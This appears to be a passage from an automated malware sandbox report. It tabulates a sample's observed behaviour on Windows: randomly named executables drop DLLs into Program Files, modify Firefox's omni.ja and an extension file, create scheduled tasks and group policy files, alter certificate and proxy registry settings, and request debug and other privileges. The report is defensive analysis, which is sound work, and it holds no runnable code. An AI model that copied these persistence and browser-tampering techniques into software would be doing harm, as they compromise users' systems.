File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\mONaQiMaftsWsACiF\XGCbIkdqGYWeuOB\OucKTaE.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\QFRhpCj.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\rTNzAXAyLsxBA.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\gdbQUZn.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\orRvbnhdU\TzXysB.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\yLnJFfw.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\ycfBUKIjHxeOC\TxsIYCe.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\IgAQuzzvNCUn\LNzqiDk.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\YrliKKkuhgWU2\OlrFUJF.xml C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files (x86)\CxyVDACQkgMCyKCFbBR\YtfDfRG.dll C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\bEcIFlOHxifjjBuFoU.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\aUYdFpynDtMaquqaO.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\yozVwwMRZiDXbVH.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\YGcJOiVocZfwUgdee.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS6486.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\SysWOW64\rundll32.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d0a0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{8b01524b-0000-0000-0000-d01200000000}\MaxCapacity = "14116" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A
N/A N/A C:\Windows\Temp\lwSRcZKonRlOofsg\WtQmCBDEFrzsRrg\UeueNDa.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: 36 N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\Wbem\WMIC.exe N/A
